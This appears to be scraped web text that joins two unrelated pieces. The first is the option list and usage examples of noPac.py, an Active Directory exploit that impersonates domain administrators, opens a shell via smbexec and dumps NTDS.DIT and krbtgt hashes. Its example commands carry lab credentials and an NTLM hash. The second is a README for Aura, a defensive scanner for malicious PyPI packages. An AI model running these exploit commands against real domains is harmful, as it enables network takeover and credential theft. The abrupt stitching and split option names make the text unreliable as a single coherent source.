[domain/]username[:password]
Account used to authenticate to DC.
optional arguments:
-h, --help show this help message and exit
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Domain NetBIOS name. Required if the DC has multiple domains.
-target-name NEWNAME Target computer name, if not specified, will be random generated.
-new-pass PASSWORD Add new computer password, if not specified, will be random generated.
-old-pass PASSWORD Target computer password, use if you know the password of the target you input with -target-name.
-ol d-hash LMHASH:NTHASH
Target computer hashes, use if you know the hash of the target you input with -target-name.
-debug Turn DEBUG output ON
-ts Adds timestamp to every logging output
-shell Drop a shell via smbexec
-no-add Forcibly change the password of the target computer.
-create-child Current account have permission to CreateChild.
-dump Dump Hashs via secretsdump
-use-ldap Use LDAP instead of LDAPS
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
-dc-ip ip IP of the domain controller to use. Useful if you can't translate the FQDN.specified in the account parameter will be used
execute options:
-port [destination port]
Destination port to connect to SMB Server
-mode {SERVER,SHARE} mode to use (default SHARE, SERVER needs root!)< br/> -share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding used (codec) from the target's output (default "GBK").
-service-name service_name
The name of theservice used to trigger the payload
dump options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-use r-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
-resumefile RESUMEFILE
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state
-use-vss Use the VSS method insead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec
Note: If -host-name is not specified, the tool will automatically get the domain control hostname, please select the hostname of the host specified by -dc-ip. If --impersonate is not specified, the tool will randomly choose a doamin admin to exploit. Use ldaps by default, if you get ssl error, try add -use-ldap .
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt
python scanner.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203
Find the computer that can be modified by the current user.
AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;computer;domain\user -recmute
Exp: add -no-add
and target with -target-name
.
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -no-add -target-name DomainWin7$ -old-hash :2a99c4a3bd5d30fc94f22bf7403ceb1a -shell
Find CreateChild account, and use the account to exploit.
AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;computer; -recmute
Exp: add -create-child
python noPac.py cgdomain.com/venus:'1qaz@WSX' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -create-child
Aura is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.
Project goals:
Feature list:
Didn't find what you are looking for? Aura's architecture is based on a robust plugin system, where you can customize almost anything, ranging from a set of data analyzers, transport protocols to custom out formats.
# Via pip:
pip install aura-security[full]
# or build from source/git
poetry install --no-dev -E full
Or just use a prebuild docker image sourcecodeai/aura:dev
docker run -ti --rm sourcecodeai/aura:dev scan pypi://requests -v
Aura uses a so-called URIs to identify the protocol and location to scan, if no protocol is used, the scan argument is treated as a path to the file or directory on a local system.
Diff packages:
docker run -ti --rm sourcecodeai/aura:dev diff pypi://requests pypi://requests2
Find most popular typosquatted packages (you need to call aura update
to download the dataset first):
aura find-typosquatting --max-distance 2 --limit 10
While there are other tools with functionality that overlaps with Aura such as Bandit, dlint, semgrep etc. the focus of these alternatives is different which impacts the functionality and how they are being used. These alternatives are mainly intended to be used in a similar way to linters, integrated into IDEs, frequently run during the development which makes it important to minimize false positives and reporting with clear actionable explanations in ideal cases.
Aura on the other hand reports on ** behavior of the code**, anomalies, and vulnerabilities with as much information as possible at the cost of false positive. There are a lot of things reported by aura that are not necessarily actionable by a user but they tell you a lot about the behavior of the code such as doing network communication, accessing sensitive files, or using mechanisms associated with obfuscation indicating a possible malicious code. By collecting this kind of data and aggregating it together, Aura can be compared in functionality to other security systems such as antivirus, IDS, or firewalls that are essentially doing the same analysis but on a different kind of data (network communication, running processes, etc).
Here is a quick overview of differences between Aura and other similar linters and SAST tools:
# nosec
that will suppress the alert at that positionAura framework is licensed under the GPL-3.0. Datasets produced from global scans using Aura are released under the CC BY-NC 4.0 license. Use the following citation when using Aura or data produced by Aura in research:
@misc{Carnogursky2019thesis,
AUTHOR = "CARNOGURSKY, Martin",
TITLE = "Attacks on package managers [online]",
YEAR = "2019 [cit. 2020-11-02]",
TYPE = "Bachelor Thesis",
SCHOOL = "Masaryk University, Faculty of Informatics, Brno",
SUPERVISOR = "Vit Bukac",
URL = "Available at WWW <https://is.muni.cz/th/y41ft/>",
}